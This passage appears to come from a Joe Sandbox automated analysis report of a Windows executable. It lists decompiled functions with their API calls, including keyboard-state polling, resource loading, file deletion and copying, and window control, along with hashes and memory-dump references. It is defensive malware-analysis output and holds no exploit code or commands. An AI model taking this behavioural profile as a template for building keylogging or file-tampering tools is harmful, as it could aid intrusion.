                                                                                                                                                                              • Opcode Fuzzy Hash: 2285d2bed4bf21d1020b51e51f12df130110a4a3339addeeed7f8a21a2b362ba
                                                                                                                                                                              • Instruction Fuzzy Hash: 8D413C75C10229ABCF11EBA5DC859EEB778FF14704F00446AE801A3261EB74AE05CBA4
                                                                                                                                                                              Function 004F7212 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004F7226
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004F7233
                                                                                                                                                                                • Part of subcall function 004D234B: __woutput_l.LIBCMT ref: 004D23A4
                                                                                                                                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 004F725D
                                                                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004F7269
                                                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 004F7276
                                                                                                                                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 004F7296
                                                                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004F72A8
                                                                                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 004F72B7
                                                                                                                                                                              • LockResource.KERNEL32(?), ref: 004F72C3
                                                                                                                                                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 004F7322
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                                                              • String ID: L6V
                                                                                                                                                                              • API String ID: 1433390588-2379597826
                                                                                                                                                                              • Opcode ID: 8aa17d0990e6c7f3c1ec96181a82cee1fe34b2ff03d1bde92e0b56ea27cb4677
                                                                                                                                                                              • Instruction ID: 7cf1eae5743816df5053ff720dc5d945e95e3fa6d5e40e4d979002bcc381930f
                                                                                                                                                                              • Opcode Fuzzy Hash: 8aa17d0990e6c7f3c1ec96181a82cee1fe34b2ff03d1bde92e0b56ea27cb4677
                                                                                                                                                                              • Instruction Fuzzy Hash: DD31AEB590425ABBCB019F60ED89ABF7BB8FF04340B004416FE06D2250E73CD955EAB8
                                                                                                                                                                              Function 004F83D6 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                                                                                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 004F843F
                                                                                                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 004F8455
                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004F8466
                                                                                                                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 004F8478
                                                                                                                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 004F8489
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: SendString$_memmove
                                                                                                                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                              • API String ID: 2279737902-1007645807
                                                                                                                                                                              • Opcode ID: 6216f917ad72f90c4e264c18f72f8122f9d30bfe3450d4b5b814978815aa5734
                                                                                                                                                                              • Instruction ID: a35f30011693665a15dfd74ceccc32cc0832017178b5f70c4d7611b5fc0fce06
                                                                                                                                                                              • Opcode Fuzzy Hash: 6216f917ad72f90c4e264c18f72f8122f9d30bfe3450d4b5b814978815aa5734
                                                                                                                                                                              • Instruction Fuzzy Hash: DE11C1A1A4026D79D720A7A2CC4ADFF7E7CFB91B04F00082EB411A71C1EEA45A45C6B4
                                                                                                                                                                              Function 004F8097 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • timeGetTime.WINMM ref: 004F809C
                                                                                                                                                                                • Part of subcall function 004CE3A5: timeGetTime.WINMM(?,76C1B400,00526163), ref: 004CE3A9
                                                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 004F80C8
                                                                                                                                                                              • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 004F80EC
                                                                                                                                                                              • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 004F810E
                                                                                                                                                                              • SetActiveWindow.USER32 ref: 004F812D
                                                                                                                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 004F813B
                                                                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004F815A
                                                                                                                                                                              • Sleep.KERNEL32(000000FA), ref: 004F8165
                                                                                                                                                                              • IsWindow.USER32 ref: 004F8171
                                                                                                                                                                              • EndDialog.USER32(00000000), ref: 004F8182
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                              • String ID: BUTTON
                                                                                                                                                                              • API String ID: 1194449130-3405671355
                                                                                                                                                                              • Opcode ID: 5c445997f7ba6b64c23839eca72d432cccffda721b77475d7a0f413ccb41dd0c
                                                                                                                                                                              • Instruction ID: ae3321daeec1c44d25ecad5fa557d4a1a0ad705d29b85d301a36715d79a1c35c
                                                                                                                                                                              • Opcode Fuzzy Hash: 5c445997f7ba6b64c23839eca72d432cccffda721b77475d7a0f413ccb41dd0c
                                                                                                                                                                              • Instruction Fuzzy Hash: 7821AFB0240208BFEB165B21BC8DE363B3BE720398B04011AF61586361CF764D4DB625
                                                                                                                                                                              Function 004FC890 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004FC6A0: __time64.LIBCMT ref: 004FC6AA
                                                                                                                                                                                • Part of subcall function 004B41A7: _fseek.LIBCMT ref: 004B41BF
                                                                                                                                                                              • __wsplitpath.LIBCMT ref: 004FC96F
                                                                                                                                                                                • Part of subcall function 004D297D: __wsplitpath_helper.LIBCMT ref: 004D29BD
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 004FC982
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004FC995
                                                                                                                                                                              • __wsplitpath.LIBCMT ref: 004FC9BA
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004FC9D0
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004FC9E3
                                                                                                                                                                                • Part of subcall function 004FC6E4: _memmove.LIBCMT ref: 004FC71D
                                                                                                                                                                                • Part of subcall function 004FC6E4: _memmove.LIBCMT ref: 004FC72C
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004FC92A
                                                                                                                                                                                • Part of subcall function 004FCE59: _wcscmp.LIBCMT ref: 004FCF49
                                                                                                                                                                                • Part of subcall function 004FCE59: _wcscmp.LIBCMT ref: 004FCF5C
                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004FCB8D
                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004FCC24
                                                                                                                                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004FCC3A
                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004FCC4B
                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004FCC5D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 152968663-0
                                                                                                                                                                              • Opcode ID: 62d52bf5a3a85f7d650a477983744720bbca50596ac41f3d24e205a37ce7f543
                                                                                                                                                                              • Instruction ID: aba585fc70bae1c10a142ea9f2bc4dd08ece9326de4a3c74e63334a1cb58d018
                                                                                                                                                                              • Opcode Fuzzy Hash: 62d52bf5a3a85f7d650a477983744720bbca50596ac41f3d24e205a37ce7f543
                                                                                                                                                                              • Instruction Fuzzy Hash: A4C12BB1D0011DAACF10DFA5CD81AEEB7BDAF99314F0040ABF609E6251D7749A84CF69
                                                                                                                                                                              Function 005008D9 Relevance: 18.2, APIs: 12, Instructions: 196COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3566271842-0
                                                                                                                                                                              • Opcode ID: d0bfa4d33d72e21d5bd78546a5a4f64d6f3e20a6c8db635e245de1ce55a78647
                                                                                                                                                                              • Instruction ID: 201afefde784cbff58da6e2eb325adfb5a3c22d408966c593c93e62118b66440
                                                                                                                                                                              • Opcode Fuzzy Hash: d0bfa4d33d72e21d5bd78546a5a4f64d6f3e20a6c8db635e245de1ce55a78647
                                                                                                                                                                              • Instruction Fuzzy Hash: AE711D75A00219AFDB10DFA5C884ADEBBB8FF48314F04849AE909AB251D734EE40CF94
                                                                                                                                                                              Function 004F388D Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 004F3908
                                                                                                                                                                              • SetKeyboardState.USER32(?), ref: 004F3973
                                                                                                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 004F3993
                                                                                                                                                                              • GetKeyState.USER32(000000A0), ref: 004F39AA
                                                                                                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 004F39D9
                                                                                                                                                                              • GetKeyState.USER32(000000A1), ref: 004F39EA
                                                                                                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 004F3A16
                                                                                                                                                                              • GetKeyState.USER32(00000011), ref: 004F3A24
                                                                                                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 004F3A4D
                                                                                                                                                                              • GetKeyState.USER32(00000012), ref: 004F3A5B
                                                                                                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 004F3A84
                                                                                                                                                                              • GetKeyState.USER32(0000005B), ref: 004F3A92
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: State$Async$Keyboard
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 541375521-0
                                                                                                                                                                              • Opcode ID: 0b320353d7dc84ce4ba5d7e82674f657a12a409278b6331b1499d543db51c1c6
                                                                                                                                                                              • Instruction ID: 0bcc58201778fecf0effb2926aae5798fef50c95ebdef5000c3400efa92c3e0f
                                                                                                                                                                              • Opcode Fuzzy Hash: 0b320353d7dc84ce4ba5d7e82674f657a12a409278b6331b1499d543db51c1c6
                                                                                                                                                                              • Instruction Fuzzy Hash: FB51B860A0478C29FB35EFA588117BBABF45F01385F08459FD7C2562C2DA5C9B8CC769
                                                                                                                                                                              Function 004EFAFD Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 004EFB19
                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004EFB2B
                                                                                                                                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 004EFB89
                                                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 004EFB94
                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004EFBA6
                                                                                                                                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 004EFBFC
                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 004EFC0A
                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004EFC1B
                                                                                                                                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 004EFC5E
                                                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 004EFC6C
                                                                                                                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 004EFC89
                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004EFC96
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3096461208-0
                                                                                                                                                                              • Opcode ID: cb3702b4e1e23dfc10fcc0054e52cb3f5fe3029e810c0956d9e074368577ecdd
                                                                                                                                                                              • Instruction ID: 0db81d06687c26c77b77ecdddff34344052e1c4448b95530b0f52fd2e61cf004
                                                                                                                                                                              • Opcode Fuzzy Hash: cb3702b4e1e23dfc10fcc0054e52cb3f5fe3029e810c0956d9e074368577ecdd
                                                                                                                                                                              • Instruction Fuzzy Hash: 10512071B00209AFDB18CFA9DD95AAEBBBAFB98311F148139F915D7390D774AD048B10
                                                                                                                                                                              Function 004CB86E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B49CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,004B4954,00000000), ref: 004B4A23
                                                                                                                                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,004CB85B), ref: 004CB926
                                                                                                                                                                              • KillTimer.USER32(00000000,?,00000000,?,?,?,?,004CB85B,00000000,?,?,004CAF1E,?,?), ref: 004CB9BD
                                                                                                                                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 0052E775
                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004CB85B,00000000,?,?,004CAF1E,?,?), ref: 0052E7A6
                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004CB85B,00000000,?,?,004CAF1E,?,?), ref: 0052E7BD
                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004CB85B,00000000,?,?,004CAF1E,?,?), ref: 0052E7D9
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 0052E7EB
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 641708696-0
                                                                                                                                                                              • Opcode ID: 2806a548d177e263b41412a93895b7c1a89c6533f3120f1de2d456711f07c627
                                                                                                                                                                              • Instruction ID: d4bc06c2d4a2a3d0343bac10733a35e481fb55506950eedb204b6823dfe9ab72
                                                                                                                                                                              • Opcode Fuzzy Hash: 2806a548d177e263b41412a93895b7c1a89c6533f3120f1de2d456711f07c627
                                                                                                                                                                              • Instruction Fuzzy Hash: 4C61E134100B11CFDB259F19E88AB26BBF1FF65311F14011EE19A466B0C734A885EF9A
                                                                                                                                                                              Function 004CB039 Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CB155: GetWindowLongW.USER32(?,000000EB), ref: 004CB166
                                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 004CB067
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ColorLongWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 259745315-0
                                                                                                                                                                              • Opcode ID: e9f6d4d94cf304310b4bf41b1cf219e3896c9295394e3fe3fc9ee3c7ff3b4bac
                                                                                                                                                                              • Instruction ID: eaa5b44f36f1cba96a390e08220059d60359399adb7449af57764d10bc6f36cd
                                                                                                                                                                              • Opcode Fuzzy Hash: e9f6d4d94cf304310b4bf41b1cf219e3896c9295394e3fe3fc9ee3c7ff3b4bac
                                                                                                                                                                              • Instruction Fuzzy Hash: 8B41C3351005109FDB205F39E84AFBA3B75EB16721F18426AFD758A2E1C7348C45EBA6
                                                                                                                                                                              Function 004F7334 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 136442275-0
                                                                                                                                                                              • Opcode ID: 156b3f7c6e23dfb8567dc48f29857763a306993c2a9cd9472b483822ee660ae8
                                                                                                                                                                              • Instruction ID: c6743a9a7ef636430402261006fe447bbf78b804ca8b8ab157c459c79ac176cc
                                                                                                                                                                              • Opcode Fuzzy Hash: 156b3f7c6e23dfb8567dc48f29857763a306993c2a9cd9472b483822ee660ae8
                                                                                                                                                                              • Instruction Fuzzy Hash: 5341F2B290411C6ADB21EB51CC65EEE73BCAB08314F1041E7F619A2151EB799BD4CF68
                                                                                                                                                                              Function 004B84A6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004B84E5
                                                                                                                                                                              • __itow.LIBCMT ref: 004B8519
                                                                                                                                                                                • Part of subcall function 004D2177: _xtow@16.LIBCMT ref: 004D2198
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __itow__swprintf_xtow@16
                                                                                                                                                                              • String ID: %.15g$0x%p$False$True
                                                                                                                                                                              • API String ID: 1502193981-2263619337
                                                                                                                                                                              • Opcode ID: b640abc092135b69677571584c8439feb6ee40991bc9588f20f92b55fb566d37
                                                                                                                                                                              • Instruction ID: 701713eaa0ceb53b064aaefb6251a15d2c65dd492437dda5f3858a22fa01c13e
                                                                                                                                                                              • Opcode Fuzzy Hash: b640abc092135b69677571584c8439feb6ee40991bc9588f20f92b55fb566d37
                                                                                                                                                                              • Instruction Fuzzy Hash: 0B412931600605EBDB24DF34D841FAA7BE9BF44314F20485FE449C7291FA399A42CB25
                                                                                                                                                                              Function 004D5C91 Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 004D5CCA
                                                                                                                                                                                • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                                                                                                                                              • __gmtime64_s.LIBCMT ref: 004D5D63
                                                                                                                                                                              • __gmtime64_s.LIBCMT ref: 004D5D99
                                                                                                                                                                              • __gmtime64_s.LIBCMT ref: 004D5DB6
                                                                                                                                                                              • __allrem.LIBCMT ref: 004D5E0C
                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004D5E28
                                                                                                                                                                              • __allrem.LIBCMT ref: 004D5E3F
